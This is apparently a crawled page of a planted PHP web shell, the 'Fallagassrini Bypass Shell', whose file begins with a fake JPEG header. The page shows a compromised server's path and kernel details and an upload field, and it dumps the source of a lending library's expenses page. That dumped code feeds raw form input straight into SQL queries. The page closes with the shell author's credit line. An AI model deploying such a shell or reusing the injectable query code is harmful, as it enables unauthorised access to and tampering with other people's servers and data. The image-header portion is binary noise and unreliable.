JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/expenses.php

<?php
include('is_autheticated.php');


if(isset($_POST['add_expense']))
{
$n=mysql_num_rows(mysql_query("select * from expense_master where expense_name='".$_POST['name']."'"));
if($n==0)
mysql_query("insert into expense_master(expense_name) values('".$_POST['name']."')");

$expense_date1=$_POST['expense_date'];
$expense_date= date('Y-m-d', strtotime($expense_date1));

$sql="insert into expenses(name,branch_name,type,expense_date,cost)values('".$_POST['p_name']."','".$_POST['base_branch']."','".$_POST['name']."','".$expense_date."','".$_POST['cost']."')";
$source=mysql_query($sql); 
if($source=1)?>
     <script type="application/javascript">
	 window.location.href="manage_expense.php?msg=success";
	 </script>
	 
 <?Php } ?>
<!DOCTYPE html>
<html lang="en">
	
<!-- Mirrored from jesus.gallery/cloud2/form.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:40:46 GMT -->
<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Easwari Lending Library</title>
				<meta name="author" content="Bootstrap Gallery" />
		<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-responsive.min.css" />
<link rel="stylesheet" href="css/colorpicker.css" />
<link rel="stylesheet" href="css/datepicker.css" />
<link rel="stylesheet" href="css/uniform.css" />
<link rel="stylesheet" href="css/select2.css" />
<link rel="stylesheet" href="css/matrix-style.css" />
<link rel="stylesheet" href="css/matrix-media.css" />
<link rel="stylesheet" href="css/bootstrap-wysihtml5.css" />
<link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700,800' rel='stylesheet' type='text/css'>

<link rel="stylesheet" href="css/animate.css" />
<link rel="stylesheet" href="css/fullcalendar.css" />
<link rel="stylesheet" href="css/jquery.gritter.css" />
	</head>  
    
    <!--<script src="js/prettify.js"></script>
<script src="jquery.js"></script>
<script src="js/bootstrap-datepicker.js"></script>-->

	<body>


		<!-- Left sidebar start -->
		<?php include('left_menu.php'); ?>
		<!-- Left sidebar end -->

		<!-- Dashboard Wrapper Start -->
		<div class="dashboard-wrapper">

			<!-- Header start -->
			<?php include('header.php'); ?>
			<!-- Header ends -->

			<!-- Main Container Start -->
		<div id="content">
<!--breadcrumbs-->
  <div id="content-header">
    <div id="breadcrumb"> <a href="index.php" title="Go to Home" class="tip-bottom"><i class="icon-home"></i> Home</a><a href="#" class="tip-bottom">Finance</a> <a href="#" class="current">Expenses</a></div>
  </div>
<!--End-breadcrumbs-->

<!--Action boxes-->
  <div class="container-fluid">
    <div class="row-fluid">
  <div class="span12">
      <div class="widget-box">
        <div class="widget-title"> <span class="icon"> <i class="icon-th-large"></i> </span>
          <h5>Expenses</h5><span class="icon" style="float:right"><a href="manage_expense.php"> <i class="icon-th-list" title="List Expenses"></i></a> </span>
        </div>
		
		<div class="widget-content nopadding">

			               <form name="books" id="books" method="post" class="form-horizontal">
						   <label><b style="color:#900"><?php echo $msg_display;?><?php echo $msg_display1;?></b></label>
                           
							 <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Expense Date</label>
							   <div class="controls">
							  <input type="text" id="expense_date" value="<?php echo date('d-m-Y'); ?>" name="expense_date" data-date="<?php echo date('d-m-Y'); ?>" data-date-format="dd-mm-yyyy" class="datepicker" tabindex="1"/>
			                 </div>
							 </div>
							 </div>
							 
                               <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Branch</label>
							   <div class="controls">
							     <select name="base_branch" id="base_branch"  required tabindex="2">
							   
							  <?php if($_SESSION['branch']==0)
							 $views=mysql_query("select * from branches order by name"); 
							 else
							 $views=mysql_query("select * from branches where id='".$_SESSION['branch']."' order by name"); 
								   while($branch=mysql_fetch_array($views)) { 	?>
							 <option value="<?php echo $branch['id']; ?>" ><?php echo $branch['name']; ?></option>
							 <?php } ?>
							  </select>
			                </div>
							</div>
							</div>
					 
						 <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Name</label>
							   <div class="controls">
							  <input type="text" name="p_name" id="p_name" required tabindex="3"  autocomplete="off">
							 </div>	
							  
							 </div>
							 </div>
							 	
                               <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Cost</label>
							   <div class="controls">
							  <input type="number" name="cost" id="cost" required tabindex="4">
							 </div>		
							 </div>
							 </div>					 
							 
 							 <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Expense Type</label>
							   <div class="controls">
							  <input type="text"  name="name" id="name" required tabindex="5" onKeyUp="showauthor()" autocomplete="off">
							 </div>	
							 <div id="authordisplay" ></div>
							 </div>
							 </div>
							 
							 
			               <div class="form-actions" align="center" style="margin-top:250px;">
							<input type="submit" name="add_expense" value="Save" class="btn btn-success" tabindex="6"  />
							<input type="reset" name="cancel" value="Cancel" class="btn btn-danger" tabindex="7" onClick="history.go(-1);">
			                </div>
							  <div id="list_books"></div>
			              </form>
						 
			            </div>
			        </div>
			        
			      </div>
			     
					</div>
					<!-- Spacer ends -->

				</div>
				<!-- Container fluid ends -->

			</div>
         
			<!-- Main Container Start -->

			<!-- Footer Start -->
			<div class="row-fluid">
  <div id="footer" class="span12"> Copyright Cloud Admin <span>2015</span>. All Rights Reserved. </div>
</div>

			<!-- Footer end -->
			
		</div>
		<!-- Dashboard Wrapper End -->
        
          <script language="javascript">
function fill1(Value)
{
$('#author').val(Value);
$('#authordisplay').hide();
}


function showreadings(str)
	{
		//alert(str);
if (str=="")
  {
  document.getElementById("txtHint").innerHTML="";
  return;
  }
if (window.XMLHttpRequest)
  {// code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp=new XMLHttpRequest();
  }
else
  {// code for IE6, IE5
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.onreadystatechange=function()
  {
  if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
    document.getElementById("read_charges").innerHTML=xmlhttp.responseText;
    }
  }
xmlhttp.open("GET","get_reading.php?s="+str,true);
xmlhttp.send();
}

	 </script>
        
          <script>
	if (top.location != location) {
    top.location.href = document.location.href ;
  }
		/*$(function(){
			window.prettyPrint && prettyPrint();
			$('#date_of_arrivals').datepicker({
				format: 'mm-dd-yyyy'
			});
			$('#dp2').datepicker();
			$('#dp3').datepicker();
			$('#dp3').datepicker();
			$('#dpYears').datepicker();
			$('#dpMonths').datepicker();
			
			
			var startDate = new Date(2012,1,20);
			var endDate = new Date(2012,1,25);
			$('#dp4').datepicker()
				.on('changeDate', function(ev){
					if (ev.date.valueOf() > endDate.valueOf()){
						$('#alert').show().find('strong').text('The start date can not be greater then the end date');
					} else {
						$('#alert').hide();
						startDate = new Date(ev.date);
						$('#startDate').text($('#dp4').data('date'));
					}
					$('#dp4').datepicker('hide');
				});
			$('#dp5').datepicker()
				.on('changeDate', function(ev){
					if (ev.date.valueOf() < startDate.valueOf()){
						$('#alert').show().find('strong').text('The end date can not be less then the start date');
					} else {
						$('#alert').hide();
						endDate = new Date(ev.date);
						$('#endDate').text($('#dp5').data('date'));
					}
					$('#dp5').datepicker('hide');
				});

        // disabling dates
        var nowTemp = new Date();
        var now = new Date(nowTemp.getFullYear(), nowTemp.getMonth(), nowTemp.getDate(), 0, 0, 0, 0);

        var checkin = $('#dpd1').datepicker({
          onRender: function(date) {
            return date.valueOf() < now.valueOf() ? 'disabled' : '';
          }
        }).on('changeDate', function(ev) {
          if (ev.date.valueOf() > checkout.date.valueOf()) {
            var newDate = new Date(ev.date)
            newDate.setDate(newDate.getDate() + 1);
            checkout.setValue(newDate);
          }
          checkin.hide();
          $('#dpd2')[0].focus();
        }).data('datepicker');
        var checkout = $('#dpd2').datepicker({
          onRender: function(date) {
            return date.valueOf() <= checkin.date.valueOf() ? 'disabled' : '';
          }
        }).on('changeDate', function(ev) {
          checkout.hide();
        }).data('datepicker');
		});*/
	</script>
    

<script type="text/javascript">
function fill(Value)
{
$('#category').val(Value);
$('#display').hide();
}
function fill1(Value)
{
$('#name').val(Value);
$('#authordisplay').hide();
}
function fill2(Value)
{
$('#publication').val(Value);
$('#publicationdisplay').hide();
}
</script>

<script type="text/javascript">
function showauthor(){
var name = $('#name').val();
var n = name.length;
if(n<4)
{
$("#authordisplay").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxexpense.php",
data: "name="+ name ,
success: function(data){
$("#authordisplay").html(data).show();
}
});
}
}


/*$(document).ready(function(){
$("#category").keyup(function() {
var category = $('#category').val();
if(category=="")
{
$("#display").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajax.php",
data: "category="+ category ,
success: function(data){
$("#display").html(data).show();
}
});
}
});

$("#publication").keyup(function() {
var publication = $('#publication').val();
if(publication=="")
{
$("#publicationdisplay").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxpublication.php",
data: "publication="+ publication ,
success: function(data){
$("#publicationdisplay").html(data).show();
}
});
}
});
});*/

function showbooks(book)
	{
		//alert(ids);
		$.ajax({
		type: "POST",
		url: "get_book.php",
		data: {book:book},
		success: function(data) {
		if(data == 1) {
                    //the email is available
                    $("#bookError").html("Book Already Exist, Kindly give new name");
                	$("#bookError").css('background-color','red');}
                else {
                    //the email is not available
                    $("#bookError").html("");
                }
			}
		});
	
	}
function list_book()
	{
	
	     var from_date = $('#expense_date').val();
		 var name = $('#name').val();
		 var branch = $('#base_branch').val();
		
		$.ajax({
		type: "POST",
		url: "expense_list.php",
		data: {from_date:from_date,name:name,branch:branch},
		success: 
		function(data) 
		{
                    $("#list_books").html(data);
        }
		
		
 		});
	   }
	
	
</script>
		<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
		

		<!-- Include all compiled plugins (below), or include individual files as needed -->
		<script src="js/jquery.min.js"></script> 
<script src="js/jquery.ui.custom.js"></script> 
<script src="js/bootstrap.min.js"></script> 
<script src="js/bootstrap-colorpicker.js"></script> 
<script src="js/bootstrap-datepicker.js"></script> 
<!--<script src="js/jquery.toggle.buttons.js"></script> -->
<script src="js/masked.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/select2.min.js"></script> 
<script src="js/matrix.js"></script> 
<script src="js/matrix.form_common.js"></script> 
<script src="js/wysihtml5-0.3.0.js"></script> 
<script src="js/jquery.peity.min.js"></script> 
<script src="js/bootstrap-wysihtml5.js"></script> 

<script src="js/bootstrap.min.new.js"></script>
<script src="js/custom.js"></script>

<script src="js/excanvas.min.js"></script> 
<!--<script src="js/jquery.min.js"></script> -->
<script src="js/bootstrap.min.js"></script> 
<script src="js/jquery.flot.min.js"></script> 
<script src="js/jquery.flot.resize.min.js"></script> 
<script src="js/jquery.peity.min.js"></script> 
<script src="js/fullcalendar.min.js"></script> 
<script src="js/matrix.js"></script> 
<script src="js/matrix.dashboard.js"></script> 
<script src="js/jquery.gritter.min.js"></script> 
<script src="js/matrix.interface.js"></script> 
<script src="js/matrix.chat.js"></script> 
<script src="js/jquery.validate.js"></script> 
<script src="js/matrix.form_validation.js"></script> 
<script src="js/jquery.wizard.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/matrix.popover.js"></script> 
<script src="js/jquery.dataTables.min.js"></script> 
<script src="js/matrix.tables.js"></script> 

<script type="text/javascript">
        $(document).ready(function () {
          //  setupTinyMCE();
            setupProgressbar('progress-bar');
            setDatePicker('entry_date');
            setupDialogBox('dialog', 'opener');
            $('input[type="checkbox"]').fancybutton();
            $('input[type="radio"]').fancybutton();
			
        });
		
    </script>
    
     <style type="text/css">
	
	button, input, select, textarea {
    border: 2px solid #bfe0f3;
    border-radius: 0;
    box-shadow: none;
    height: 40px;
	 padding: 8px 16px;
}
	
	
	.read_charges {
    border: 2px solid #bfe0f3;
    border-radius: 0;
    box-shadow: none;
    height: 40px;
    padding: 8px 16px;
}
	</style>

	</body>

<!-- Mirrored from jesus.gallery/cloud2/form.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:40:46 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net